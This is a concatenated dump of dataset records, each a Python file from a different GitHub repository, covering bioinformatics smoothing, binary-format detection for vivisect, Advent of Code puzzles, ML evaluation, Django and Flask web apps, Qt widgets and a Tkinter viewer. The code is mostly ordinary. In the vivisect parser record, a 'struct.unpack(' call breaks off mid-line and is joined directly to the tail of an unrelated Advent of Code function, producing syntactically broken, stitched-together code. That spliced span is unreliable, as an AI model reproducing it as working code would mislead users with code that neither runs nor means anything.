as the fraction of the range of the\n cell scores for each PC. Default: 0.03.\n random_state : int, optional\n The seed for initializing the pseudo-random number generator used by\n the randomized PCA algorithm. This usually does not need to be changed.\n Default: 42.\n\n Returns\n -------\n AnnData\n An AnnData object containing the smoothed expression matrix in adata.X.\n \"\"\"\n adatas = []\n for _, subset_df in adata.obs.groupby(groupby):\n adata_sub = adata[subset_df.index, :].copy()\n sc.pp.filter_genes(adata_sub, min_cells=1)\n sc.pp.filter_cells(adata_sub, min_genes=1)\n S = knn_smoothing(adata_sub.X.toarray(), k=k, d=n_components, dither=dither, seed=random_state)\n adata_sub.X = csr_matrix(S)\n adatas.append(adata_sub)\n adata_knn = sc.concat(adatas, join='outer', merge='first')\n return adata_knn\n\n\n# if __name__ == '__main__':\n# import scanpy as sc\n# import cellrank as cr\n\n# adata = cr.datasets.reprogramming_schiebinger()\n# sc.pp.subsample(adata, fraction=0.1)\n# sc.pp.filter_genes(adata, min_cells=10)\n# sc.pp.filter_cells(adata, min_genes=100)\n# S = knn_smoothing(adata.X.toarray(), k=2, d=10, dither=0, seed=42, verbose=True)","repo_name":"ricomnl/biolib","sub_path":"biolib/knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":9807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3267578854","text":"\"\"\"\nThe vivisect.parsers package contains all the known file format parsers\nfor vivisect. Each parser module must implement the following functions:\n\n parseFile(workspace, filename):\n Load the file into the given workspace\n parseBytes(workspace, bytes):\n Load the file (pre-read in) into the workspace\n\n\"\"\"\n# Some parser utilities\n\nimport sys\nimport struct\nimport hashlib\n\nimport vstruct.defs.macho as vs_macho\n\n\ndef md5File(filename: str):\n d = hashlib.md5()\n with open(filename, \"rb\") as f:\n bytes = f.read(4096)\n while len(bytes):\n d.update(bytes)\n bytes = f.read(4096)\n return d.hexdigest()\n\n\ndef md5Bytes(bytes):\n d = hashlib.md5()\n d.update(bytes)\n return d.hexdigest()\n\n\nmacho_magics = (\n vs_macho.MH_MAGIC,\n vs_macho.MH_CIGAM,\n vs_macho.MH_MAGIC_64,\n vs_macho.MH_CIGAM_64,\n vs_macho.FAT_MAGIC,\n vs_macho.FAT_CIGAM,\n)\n\n\ndef guessFormat(bytes):\n if bytes.startswith(b'VIV'):\n return 'viv'\n\n if bytes.startswith(b\"MZ\"):\n return 'pe'\n\n if bytes.startswith(b\"\\x7fELF\"):\n return 'elf'\n\n if bytes.startswith(b\"\\x7fCGC\"):\n return 'cgc'\n\n bytemagic = struct.unpack(' distance_to_san else min_distance\n\n return min_distance\n\n\n return get_min_distance_to_san('YOU', 0) - 2\n\n\nprint('Part 1: ', part1())\nprint('Part 2: ', part2())\n","repo_name":"victorkirov/aoc","sub_path":"2019/6/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29476496271","text":"import torch\n\nfrom .base import *\nimport data.constants as dconstants\nfrom .uncertainty_quantification import OODSeparation\nimport evaluation.callbacks\nfrom evaluation.util import run_model_on_datasets, get_data_loader\nfrom evaluation.logging import *\n\n@register_pipeline_member\nclass EvaluateAccuracy(OODSeparation):\n \"\"\" Pipeline member to evaluate the accuracy of the model on a dataset. Note: The dataset should follow the train labels. \"\"\"\n\n name = 'EvaluateAccuracy'\n\n def __init__(self, evaluate_on=[dconstants.OOD_VAL], gpus=0, **kwargs):\n super().__init__(evaluate_on=evaluate_on, **kwargs)\n self.gpus = gpus\n\n @property\n def configuration(self):\n return super().configuration\n \n @torch.no_grad()\n def __call__(self, *args, **kwargs):\n \n cfg: configuration.ExperimentConfiguration = kwargs['config']\n predictions, labels, mask = run_model_on_datasets(\n kwargs['model'], [get_data_loader(name, kwargs['data_loaders']) for name in self.evaluate_on], \n gpus=self.gpus, model_kwargs=self.model_kwargs_evaluate,\n callbacks = [\n evaluation.callbacks.make_callback_get_predictions(),\n evaluation.callbacks.make_callback_get_ground_truth(),\n evaluation.callbacks.make_callback_is_ground_truth_in_labels(\n cfg.data.train_labels),\n\n ])\n mask, predictions, labels = torch.cat(mask, dim=0), torch.cat(predictions, dim=0), torch.cat(labels)\n is_id, is_id_mask, _, _ = self.get_ood_distribution_labels(**kwargs)\n\n # Accuracy should only be computed for classes the model can actually predict\n predictions, labels, is_id_mask, is_id = predictions[mask], labels[mask], is_id_mask[mask], is_id[mask]\n\n _, hard = predictions.max(dim=-1)\n acc = (hard == labels).float().mean()\n acc_id = (hard == labels)[(is_id == 1) & is_id_mask].float().mean()\n acc_ood = (hard == labels)[(is_id == 0) & is_id_mask].float().mean()\n\n dataset_names = '-'.join(self.evaluate_on)\n kwargs['metrics'][f'accuracy_{dataset_names}{self.suffix}'] = acc.item()\n kwargs['metrics'][f'accuracy_id_{dataset_names}{self.suffix}'] = acc_id.item()\n kwargs['metrics'][f'accuracy_ood_{dataset_names}{self.suffix}'] = acc_ood.item()\n pipeline_log(f'Evaluated accuracy for {self.evaluate_on}.')\n\n return args, kwargs\n\n","repo_name":"dfuchsgruber/MasterThesis","sub_path":"evaluation/pipeline/accuracy.py","file_name":"accuracy.py","file_ext":"py","file_size_in_byte":2443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6239969613","text":"from django.urls import path\nfrom .views import homeview,tajikabad,ms,jinnah,ms_heights,aboutus,latest_project,posts,sig_post,contact_us\nfrom django.conf import settings # new\nfrom django.conf.urls.static import static # new\n\nurlpatterns = [\n path('', homeview, name='homepage'),\n path('aghajee-apart', tajikabad, name='tj'),\n path('jinnah-apartment', jinnah, name='jin'),\n path('Aghajee-malik-saleem ', ms, name='ms'),\n path('Aghajee-malik-saleem-height ', ms_heights, name='msh'),\n path('latest-projects ', latest_project, name='lstt'),\n path('about-us', aboutus, name='abt'),\n path('contact-us', contact_us, name='cont-us'),\n path('blog', posts , name='psts'),\n path('', sig_post, name='sigpst'),\n\n]\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"iffikhan1717/brandnew","sub_path":"website/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15455016529","text":"import FWCore.ParameterSet.Config as cms\n\nimport os\n\nprocess = cms.PSet()\n\nprocess.fwliteInput = cms.PSet(\n fileNames = cms.vstring(),\n \n maxEvents = cms.int32(-1),\n \n outputEvery = cms.uint32(100000)\n)\n\nprocess.fwliteInput.fileNames = cms.vstring(\n 'reweightTreeAntiElectronDiscrMVA_signal.root',\n 'reweightTreeAntiElectronDiscrMVA_background.root'\n)\n\nprocess.trainTauIdMVA = cms.PSet(\n\n treeName = cms.string('reweightedAntiElectronDiscrMVATrainingNtuple'),\n\n signalSamples = cms.vstring('signal'),\n backgroundSamples = cms.vstring('background'),\n\n applyPtReweighting = cms.bool(True),\n applyEtaReweighting = cms.bool(True),\n reweight = cms.string(\"flat\"),\n \n branchNameEvtWeight = cms.string('evtWeight'),\n\n applyEventPruning = cms.int32(0),\n\n mvaName = cms.string(\"mvaAntiElectronDiscr\"),\n mvaMethodType = cms.string(\"BDT\"),\n mvaMethodName = cms.string(\"BDTG\"),\n mvaTrainingOptions = cms.string(\n \"!H:!V:NTrees=600:BoostType=Grad:Shrinkage=0.30:UseBaggedGrad:GradBaggingFraction=0.6:SeparationType=GiniIndex:nCuts=20:PruneMethod=CostComplexity:PruneStrength=50:NNodesMax=5\"\n ),\n inputVariables = cms.vstring(\n\n ),\n spectatorVariables = cms.vstring(\n 'Tau_Pt/F',\n 'Tau_Eta/F',\n 'Tau_DecayMode/F',\n 'Tau_LeadHadronPt/F',\n 'Tau_LooseComb3HitsIso/F',\n 'NumPV/I' \n ),\n\n outputFileName = cms.string('trainAntiElectronDiscrMVA.root')\n)\n","repo_name":"cms-tau-pog/TauAnalysisTools","sub_path":"TauAnalysisTools/test/trainAntiElectronDiscrMVA_cfg.py","file_name":"trainAntiElectronDiscrMVA_cfg.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"14722666784","text":"\"\"\"Netstring encoder / decoder module\r\n\r\nEncodes and decodes netstring streams, or files.\"\"\"\r\n\r\nclassifiers = \"\"\"\\\r\nDevelopment Status :: 5 - Production/Stable\r\nIntended Audience :: Developers\r\nProgramming Language :: Python\r\nLicense :: Public Domain\r\nOperating System :: OS Independent\r\nTopic :: Internet\r\n\"\"\"\r\n\r\nfrom distutils.core import setup\r\nfrom netstring import __version__\r\n\r\ndoclines = __doc__.split(\"\\n\")\r\n\r\nsetup( name='netstring',\r\n version = __version__, \r\n author = 'Will McGugan',\r\n author_email = 'will@willmcgugan.com',\r\n license = \"public domain\",\r\n url = 'http://code.google.com/p/netstring/',\r\n download_url = 'http://code.google.com/p/netstring/downloads/list',\r\n platforms = ['any'],\r\n description = doclines[0],\r\n long_description = '\\n'.join(doclines[2:]),\r\n py_modules = ['netstring'],\r\n classifiers = classifiers.splitlines(),\r\n )\r\n","repo_name":"willmcgugan/netstring","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"1643426730","text":"\nimport pandas\nimport numpy as np\nfrom sklearn import tree\n\n'''\nNote:\nThis is a poor way of going about making a predictions. While the accuracy is somwhere around 70%,\nthis model takes too many variables into account. A better implementation of this would use the logistic\nregression model from the original competition to choose which variables to use and then use sklearn to\ncreate a model that only uses the variables with the highest correlation to attitrion status.\n'''\n\ndf = pandas.read_csv('cleaned_data.csv')\n\nprint(df.dtypes)\nprint(df.head())\n\nx_values = df[4:].values\nprint(x_values)\n\ny_values = df['AttritionStatus'].values\nprint(y_values)\n\nclassifier = tree.DecisionTreeClassifier()\nclassifier = classifier.fit(x_values[:750], y_values[:750]) # use the first 3/4 of the data for training\n\npredictions = classifier.predict(x_values[750:])\n\ncorrect = 0\nfor i,p in enumerate(predictions):\n\t#print('Prediction:', p, 'Actual:', y_values[750+i], '[Correct]' if p == y_values[750+i] else '')\n\tcorrect += 1 if p == y_values[750+i] else 0\n\nprint('Accuracy:', correct/250)","repo_name":"brett-dun/Undergraduate-Data-Analytics-Competition-2019-Revisited","sub_path":"tree_classification.py","file_name":"tree_classification.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"35527597625","text":"#Flaskとrender_template(HTMLを表示させるための関数)をインポート\nfrom flask import Flask,render_template,request,redirect,url_for,send_from_directory,session\nfrom app.models.models import Member\nfrom app.models.models import News\nfrom app.models.database import db_session\nfrom datetime import datetime\nfrom werkzeug import secure_filename\nfrom app import key \nimport os\n#Flaskオブジェクトの生成\napp = Flask(__name__)\napp.secret_key = key.getSessionKey()\n\n### 基本ページ\n@app.route(\"/top\")\ndef top():\n return render_template(\"top.html\")\n\n@app.route(\"/member\")\ndef member():\n all_member = Member.query.all()\n return render_template(\"member.html\",all_member=all_member)\n\n@app.route(\"/news\")\ndef news():\n all_news = News.query.all()\n all_news = sorted(all_news, key=lambda u: u.date,reverse=True)\n return render_template(\"news.html\",all_news=all_news)\n\n@app.route(\"/contact\")\ndef contact():\n return render_template(\"contact.html\")\n\n@app.route(\"/twitter\")\ndef twitter():\n return render_template(\"twitter.html\")\n\n### 管理者ログイン\n\n@app.route(\"/admin\", methods = [\"get\"])\ndef admin():\n return render_template(\"admin.html\")\n\n@app.route(\"/admin\",methods=[\"post\"])\ndef login():\n password = request.form[\"password\"]\n if password == key.getAdminKey():\n session[\"admin\"] = \"admin\"\n return redirect(\"/edit\")\n else:\n return render_template(\"admin.html\",alert=\"Not correct pass\")\n\n@app.route(\"/logout\")\ndef logout():\n session.pop(\"admin\", None)\n return redirect(\"/admin\")\n\n\n### 管理者系処理\n\n@app.route(\"/edit\")\ndef edit():\n if \"admin\" in session:\n all_member = Member.query.all()\n all_news = News.query.all()\n return render_template(\"edit.html\", all_member=all_member, all_news=all_news)\n else :\n return redirect(\"/admin\")\n## ファイルアップロード\nUPLOAD_FOLDER = './app/static/member_images'\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\n@app.route(\"/member_add\",methods =[\"post\"])\ndef member_add():\n name = request.form[\"name\"]\n img_file = request.files['member_image']\n twitter = request.form[\"twitter\"]\n content = Member(name,twitter)\n db_session.add(content)\n db_session.commit()\n member = Member.query.filter_by(name=name).first()\n filename = str(member.id)+\".png\"\n img_file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n return redirect(\"/edit\")\n\n\n@app.route(\"/member_del\", methods =[\"post\"])\ndef member_del():\n id_list = request.form.getlist(\"del\")\n for id in id_list:\n content = Member.query.filter_by(id=id).first()\n db_session.delete(content)\n db_session.commit()\n return redirect(\"/edit\")\n\n@app.route(\"/news_add\", methods =[\"post\"])\ndef news_add():\n date = request.form[\"date\"]\n text = request.form[\"text\"]\n content = News(date,text)\n db_session.add(content)\n db_session.commit()\n return redirect(\"/edit\")\n\n\n@app.route(\"/news_del\", methods =[\"post\"])\ndef news_del():\n id_list = request.form.getlist(\"del\")\n for id in id_list:\n content = News.query.filter_by(id=id).first()\n db_session.delete(content)\n db_session.commit()\n return redirect(\"/edit\")\n\n\n#おまじない\nif __name__ == \"__main__\":\n app.run(debug=True)\n\n ","repo_name":"teruto725/hopers","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4900126495","text":"from abc import abstractmethod\nfrom datetime import datetime\nfrom typing import TypeVar\n\nfrom ..extensions import db_wrapper as db\n\nB = TypeVar('B', bound='BaseModel')\n\n\nclass Base(db.Model):\n class Meta:\n database = db.database\n\n @abstractmethod\n def save(self, *args: list, **kwargs: dict) -> int:\n if hasattr(self, 'created_at') and hasattr(self, 'deleted_at'):\n current_date = datetime.utcnow()\n\n if self.id is None and self.created_at is None:\n self.created_at = current_date\n\n if self.deleted_at is None:\n self.updated_at = current_date\n\n return super(Base, self).save(*args, **kwargs)\n\n @classmethod\n def get_fields(cls, exclude: list = None, include: list = None,\n sort_order: list = None) -> set:\n exclude = exclude or []\n include = include or []\n sort_order = sort_order or []\n\n fields = set(filter(\n lambda x: x not in exclude,\n list(cls._meta.fields)\n ))\n\n if include:\n fields = set(filter(\n lambda x: x in include,\n list(cls._meta.fields)\n ))\n\n if sort_order and len(fields) == len(sort_order):\n fields = sorted(fields, key=lambda x: sort_order.index(x))\n\n return fields\n\n @staticmethod\n def raw(query: str):\n return db.database.execute_sql(query)\n\n def reload(self):\n return type(self).get(self._pk_expr())\n","repo_name":"Rubenrod18/flask_api","sub_path":"app/models/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"44735507974","text":"\r\n\r\nfrom __future__ import print_function\r\n\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\n\r\nfrom math import *\r\n\r\nimport globals, daqIO, variable\r\n\r\nclass DaqItemDelegate(QtWidgets.QStyledItemDelegate):\r\n \r\n parent = None\r\n dataModel = None\r\n bIsAdaptiveTimeUnit = True\r\n\r\n def __init__(self, parent, dataModel):\r\n QtWidgets.QStyledItemDelegate.__init__(self, parent)\r\n self.parent = parent\r\n self.dataModel = dataModel\r\n\r\n def setAdaptiveTimeUnit(self, bIsAdaptiveTimeUnit):\r\n self.bIsAdaptiveTimeUnit = bIsAdaptiveTimeUnit\r\n\r\n def getTimeUnit(self, dTime):\r\n aUnits = ['s', 'ms', 'us', 'ns']\r\n nUnit = 0\r\n if (dTime >= 0):\r\n while (dTime < 1 and nUnit + 1 < len(aUnits)):\r\n dTime *= 1000\r\n nUnit += 1\r\n return dTime, aUnits[nUnit]\r\n\r\n def paint(self, painter, option, index):\r\n if index.column() == 0:\r\n color = QtGui.QColor(0, 0, 0, 255)\r\n else:\r\n varIdx = self.dataModel.enabledVars[index.column()-1]\r\n var = self.parent.daqIdeaConfig.variableConfigs[varIdx]\r\n daqIdx = var.daqConfigIndex\r\n \r\n realValue = self.parent.daqManager.isRealValue(index.row(), daqIdx)\r\n \r\n if realValue:\r\n color = QtGui.QColor(0, 0, 0, 255)\r\n else:\r\n color = QtGui.QColor(0, 0, 0, 127)\r\n \r\n option.palette.setColor(QtGui.QPalette.Text, color)\r\n \r\n if index.column() == 0:\r\n strTime = None\r\n dTime = self.dataModel.getData(index.row(), index.column())\r\n if self.bIsAdaptiveTimeUnit:\r\n strUnit = None\r\n dTime, strUnit = self.getTimeUnit(dTime)\r\n strTime = \"{:.4f} {}\".format(dTime, strUnit)\r\n else:\r\n strTime = \"{:10.6f}\".format(dTime)\r\n\r\n option.rect.setWidth(option.rect.width() - 3)\r\n painter.drawText(option.rect, QtCore.Qt.AlignRight | QtCore.Qt.AlignCenter, strTime);\r\n else:\r\n return QtWidgets.QStyledItemDelegate.paint(self, painter, option, index)\r\n \r\n \r\nclass DaqTableModel(QtCore.QAbstractTableModel):\r\n \r\n parent = None\r\n enabledVars = []\r\n dataModelFull = True\r\n strTimeUnit = None\r\n\r\n def __init__(self, parent, daqCfg, *args):\r\n QtCore.QAbstractTableModel.__init__(self, parent, *args)\r\n self.parent = parent\r\n\r\n def rowCount(self, parent):\r\n return self.getRowCount() \r\n \r\n def getRowCount(self):\r\n return len(self.parent.daqManager.allTimePoints)\r\n \r\n def columnCount(self, parent):\r\n return self.getColumnCount()\r\n \r\n def getColumnCount(self):\r\n return len(self.enabledVars) + 1\r\n\r\n def data(self, index, role):\r\n if (self.parent.daqManager.wasConfigured and \r\n index.isValid() and \r\n role == QtCore.Qt.DisplayRole):\r\n\r\n r = index.row()\r\n c = index.column()\r\n\r\n return self.getData(r, c)\r\n else:\r\n return None\r\n \r\n def getData(self, r, c):\r\n if (c == 0):\r\n return self.parent.daqManager.allTimePoints[r]\r\n else:\r\n varIdx = self.enabledVars[c-1]\r\n var = self.parent.daqIdeaConfig.variableConfigs[varIdx]\r\n daqIdx = var.daqConfigIndex\r\n \r\n if (daqIdx >= 0):\r\n daq = self.parent.daqManager\r\n \r\n varType = self.parent.daqManager.getVariableByName(var.name)\r\n if varType == None:\r\n return 'N/A'\r\n \r\n if (not self.dataModelFull) and (not daq.isRealValue(r, daqIdx)):\r\n return ''\r\n \r\n if (varType != None and \r\n varType.simpleType == variable.TYPE_IO and \r\n varType.portType == daqIO.HIL_AIN):\r\n \r\n formater = '{0:f}'\r\n return formater.format(daq.getEstimatedValue(r, daqIdx))\r\n else:\r\n formater = globals.formatterStrings[var.format]\r\n return formater.format(daq.getEstimatedValue(r, daqIdx))\r\n else:\r\n return 'N/A'\r\n \r\n \r\n def headerData(self, idx, orientation, role):\r\n if role == QtCore.Qt.DisplayRole:\r\n if orientation == QtCore.Qt.Horizontal:\r\n return self.getHorizontalHeaderName(idx)\r\n elif orientation == QtCore.Qt.Vertical:\r\n return self.getVerticalHeaderName(idx)\r\n else:\r\n return None\r\n \r\n def setTimeUnit(self, strUnit):\r\n self.strTimeUnit = strUnit\r\n\r\n def getHorizontalHeaderName(self, column):\r\n if column == 0:\r\n strColumn = 'Time'\r\n if None != self.strTimeUnit:\r\n strColumn = 'Time [{}]'.format(self.strTimeUnit)\r\n return strColumn\r\n else:\r\n varIdx = self.enabledVars[column-1]\r\n return self.parent.daqIdeaConfig.variableConfigs[varIdx].name\r\n \r\n def getVerticalHeaderName(self, row):\r\n return row + 1\r\n \r\n def isRealValue(self, row, column):\r\n if (column == 0):\r\n return True\r\n else:\r\n varIdx = self.enabledVars[column-1]\r\n var = self.parent.daqIdeaConfig.variableConfigs[varIdx]\r\n daqIdx = var.daqConfigIndex\r\n \r\n if (daqIdx >= 0):\r\n return self.parent.daqManager.isRealValue(row, daqIdx)\r\n else:\r\n return 'N/A'\r\n\r\n def setDataModelEstimation(self, full):\r\n self.dataModelFull = full\r\n\r\n # If the DAQ was reconfigured then we should call this\r\n def updateDataModel(self):\r\n # Checks which variables are used (excluding the disabled ones)\r\n newVars = []\r\n for idx, var in enumerate(self.parent.daqIdeaConfig.variableConfigs):\r\n if var.enabled:\r\n newVars.append(idx)\r\n \r\n self.beginResetModel()\r\n self.enabledVars = newVars\r\n self.endResetModel()\r\n \r\n self.updateFormatting()\r\n\r\n \r\n def updateFormatting(self):\r\n rc = len(self.parent.daqManager.allTimePoints)\r\n \r\n if (rc > 0): \r\n for rowIdx, varConfig in enumerate(self.parent.daqIdeaConfig.variableConfigs):\r\n self.beginRemoveRows(QtCore.QModelIndex(), 0, rc-1)\r\n self.endRemoveRows()\r\n\r\n self.beginInsertRows(QtCore.QModelIndex(), 0, rc-1);\r\n self.endInsertRows()\r\n \r\n\r\nclass VariableChooserCombo(QtWidgets.QComboBox):\r\n \r\n parent = None\r\n variables = []\r\n allFullNames = None\r\n completer = None\r\n lastText = None\r\n \r\n selectedVariable = None\r\n variableConfig = None\r\n \r\n itemsSet = None\r\n \r\n comboDeleted = False\r\n \r\n def __init__(self, p, varCfg):\r\n QtWidgets.QComboBox.__init__(self, p)\r\n self.parent = p\r\n self.variableConfig = varCfg\r\n self.itemsSet = False\r\n \r\n def setVariables(self, vars):\r\n self.variables = vars\r\n self.allFullNames = []\r\n \r\n for var in self.variables:\r\n self.allFullNames.append(var.fullName)\r\n \r\n self.allFullNames = sorted(self.allFullNames)\r\n \r\n self.clear()\r\n self.addItems(self.allFullNames)\r\n self.setEditable(True)\r\n \r\n self.completer = QtWidgets.QCompleter(self.allFullNames, self.parent)\r\n self.completer.setCaseSensitivity(QtCore.Qt.CaseSensitive)\r\n self.completer.setModelSorting(QtWidgets.QCompleter.CaseSensitivelySortedModel)\r\n self.completer.setCompletionMode(QtWidgets.QCompleter.PopupCompletion)\r\n \r\n self.completer.setMaxVisibleItems(20)\r\n \r\n self.setCompleter(self.completer)\r\n\r\n \r\n # variables with complexity of *name[3][4] \r\n #rx = QtCore.QRegExp(\"\\*?[A-Za-z_][A-Za-z0-9_]*((\\[\\d{1,4}\\])|(\\[\\]))*\")\r\n \r\n '''\r\n rx = QtCore.QRegExp(\"(([A-Za-z_]\" + # var start char\r\n \"[A-Za-z0-9_]*\" + # rest of chars\r\n \"(\\[\\d{0,4}\\])*)\" + # array indices\r\n \"(,,[A-Za-z0-9_\\-\\.\\\\ ]+))|\" +\r\n \"(0x[0-9a-fA-F]{0,8})\" # or just plain hex memory address\r\n )\r\n \r\n v = QtGui.QRegExpValidator(rx)\r\n self.setValidator(v)\r\n ''' \r\n self.itemsSet = True\r\n \r\n # New config\r\n if (len(self.variableConfig.name) <= 0):\r\n self.setCurrentIndex(0)\r\n \r\n self.parent.setVariableValidityStatus('black', 'Please select variable name for each row inside of variable table!')\r\n else:\r\n self.setEditText(self.variableConfig.name)\r\n \r\n \r\n def event(self, event):\r\n QtWidgets.QComboBox.event(self, event)\r\n \r\n if self.comboDeleted:\r\n return True\r\n \r\n if (not self.itemsSet):\r\n return True\r\n \r\n old = str(self.lastText)\r\n new = str(self.currentText())\r\n \r\n if (old != new):\r\n self.lastText = new\r\n self.variableConfig.name = new\r\n \r\n \r\n oldVar = self.variableConfig.variable\r\n try:\r\n newVar = self.parent.daqManager.getVariableByName(new)\r\n except:\r\n newVar = None\r\n \r\n if (newVar != None and \r\n newVar != oldVar):\r\n self.variableConfig.variable = newVar\r\n \r\n if (oldVar == None or\r\n newVar.formatters != oldVar.formatters):\r\n self.variableConfig.updateFormatterComboBox()\r\n \r\n self.parent.checkAllVariablesValidity()\r\n \r\n return True\r\n \r\n \r\n def removing(self):\r\n self.comboDeleted = True\r\n\r\n \r\n # Count how many first characters are equal in both strings\r\n def countCharMatch(self, s1, s2):\r\n c = min(len(s1), len(s2))\r\n res = 0;\r\n for i in range(0, c):\r\n if (s1[res] == s2[res]):\r\n res += 1\r\n \r\n return res\r\n\r\n\r\n\r\nclass DeleteButton(QtWidgets.QPushButton):\r\n \r\n myParent = None\r\n varConfig = None\r\n\r\n def __init__(self, parent, varCfg):\r\n QtWidgets.QPushButton.__init__(self)\r\n self.myParent = parent\r\n self.varConfig = varCfg\r\n self.clicked.connect(self.deleteButtonClick)\r\n\r\n def deleteButtonClick(self):\r\n # find the button that called this delete event\r\n configs = self.myParent.daqIdeaConfig.variableConfigs\r\n varIdx = configs.index(self.varConfig)\r\n\r\n if (varIdx >= 0):\r\n configs.pop(varIdx)\r\n \r\n self.myParent.variableTable.cellWidget(varIdx, globals.TABLE_COLUMN_NAME).removing()\r\n self.myParent.variableTable.removeRow(varIdx)\r\n self.myParent.canvasGraph.updateChartSubplots()\r\n self.myParent.checkAllVariablesValidity()\r\n \r\n\r\n\r\nclass ColorButton(QtWidgets.QPushButton):\r\n \r\n myParent = None\r\n variableConfig = None\r\n\r\n def __init__(self, parent, varCfg):\r\n QtWidgets.QPushButton.__init__(self)\r\n self.myParent = parent\r\n self.variableConfig = varCfg\r\n \r\n self.clicked.connect(self.colorButtonClick)\r\n\r\n def colorButtonClick(self):\r\n\r\n oldc = self.variableConfig.color\r\n r = (oldc >> 16) & 0xff\r\n g = (oldc >> 8) & 0xff\r\n b = oldc & 0xff\r\n \r\n c = QtGui.QColor(r, g, b)\r\n res = QtWidgets.QColorDialog.getColor(c)\r\n \r\n if (res.value() != 0):\r\n newc = (res.red() << 16) + (res.green() << 8) + res.blue() \r\n \r\n if (newc != oldc):\r\n self.variableConfig.color = newc\r\n self.variableConfig.floatColor = (res.red()/255.0, res.green()/255.0, res.blue()/255.0)\r\n self.updateIcon()\r\n \r\n if (not self.myParent.canvasGraph.isAnimationRunning()):\r\n self.myParent.canvasGraph.updateCharts()\r\n\r\n\r\n def updateIcon(self):\r\n c = self.variableConfig.color\r\n color = QtGui.QColor((c >> 16) & 0xff, (c >> 8) & 0xff, c & 0xff, 0xff)\r\n\r\n pixmap = QtGui.QPixmap(40, 40)\r\n pixmap.fill(color)\r\n icon = QtGui.QIcon(pixmap)\r\n self.setIcon(icon)\r\n\r\n\r\nclass ScaleSpinner(QtWidgets.QSpinBox):\r\n \r\n myParent = None\r\n lastValue = None\r\n sign = None\r\n variableConfig = None\r\n \r\n def __init__(self, parent, varCfg):\r\n global spinnerCount\r\n \r\n QtWidgets.QSpinBox.__init__(self)\r\n self.myParent = parent\r\n self.variableConfig = varCfg\r\n\r\n self.setWrapping(True)\r\n self.setRange(-9, 9)\r\n self.setPrefix('1e')\r\n self.setValue(0)\r\n self.lastValue = 0\r\n self.sign = 1\r\n \r\n self.valueChanged.connect(self.valChanged)\r\n \r\n def valChanged(self):\r\n self.valueChanged.disconnect(self.valChanged)\r\n\r\n old = self.lastValue\r\n new = self.value()\r\n \r\n if ((old == 9 and new == -9) or \r\n (old == -9 and new == 9)):\r\n self.sign *= -1\r\n self.setPrefix(str(int(self.sign))+'e')\r\n \r\n self.lastValue = new\r\n self.valueChanged.connect(self.valChanged)\r\n \r\n self.variableConfig.scale = self.getMultiplicator()\r\n \r\n def getMultiplicator(self):\r\n return self.sign * (10**self.value())\r\n \r\n def setMultiplicator(self, m):\r\n \r\n if (m < 0.0):\r\n self.sign = -1\r\n self.setPrefix('-1e')\r\n else:\r\n self.sign = 1\r\n self.setPrefix('1e')\r\n \r\n self.setValue(int(round(log(self.sign*m, 10))))\r\n","repo_name":"iSYSTEMLabs/daqIDEA","sub_path":"src/widgets.py","file_name":"widgets.py","file_ext":"py","file_size_in_byte":14170,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"29564480785","text":"def checker(i, numbers):\n target = numbers[i]\n prevNum = numbers[i-25: i]\n if prevNum.count(target/2) > 1:\n return True\n prevSet = set(prevNum)\n prevSet.discard(target/2)\n for iterator in prevSet:\n if target-iterator in prevSet:\n return True\n return False\n\ndef findNumber(numbers):\n for i in range(25, len(numbers)):\n if not checker(i, numbers):\n return numbers[i]\n\ndef weakness(numbers):\n target = findNumber(numbers)\n for i, num in enumerate(numbers):\n aux = [num]\n next = i+1\n while sum(aux) < target:\n aux.append(numbers[next])\n next += 1\n if len(aux) >= 2 and sum(aux) == target:\n return min(aux) + max(aux)\n\ndef main():\n with open(\"inputDay9.txt\", 'r') as _file:\n numbers = list(map(int, _file.read().splitlines()))\n print(weakness(numbers))\nmain()\n\n","repo_name":"MAInformatico/Advent_Of_Code2020","sub_path":"day9part2.py","file_name":"day9part2.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36678441501","text":"\n\"\"\"\nimtools toolbox\nauthor: Lionel Moisan\n\nv0.1 (10/2022): initial version (View)\n\navailable functions/classes:\nload(filename): load image\nView(image): interactive visualization\n\"\"\"\n\nfrom matplotlib import image\nimport tkinter as tk\nimport numpy as np\n\ndef load(filename):\n return image.imread(filename)\n\nclass View():\n def __init__(self, image, name=\"Image Viewer\"):\n self.win = tk.Tk()\n self.name = name # nom de la fenêtre\n self.ny, self.nx = image.shape # taille de la fenêtre\n self.u = image # image source\n self.dyn = [np.min(self.u),np.max(self.u)]\n self.x0, self.y0 = 0, 0 # coordonnées dans u du pixel haut,gauche affiché\n self.zoom = 1 # facteur de zoom\n self.zoom_method = 'nearest neighbor' # méthode de zoom\n self.dragflag = False # pas de glisser-déposer en cours\n self.win.title(self.name)\n self.can = 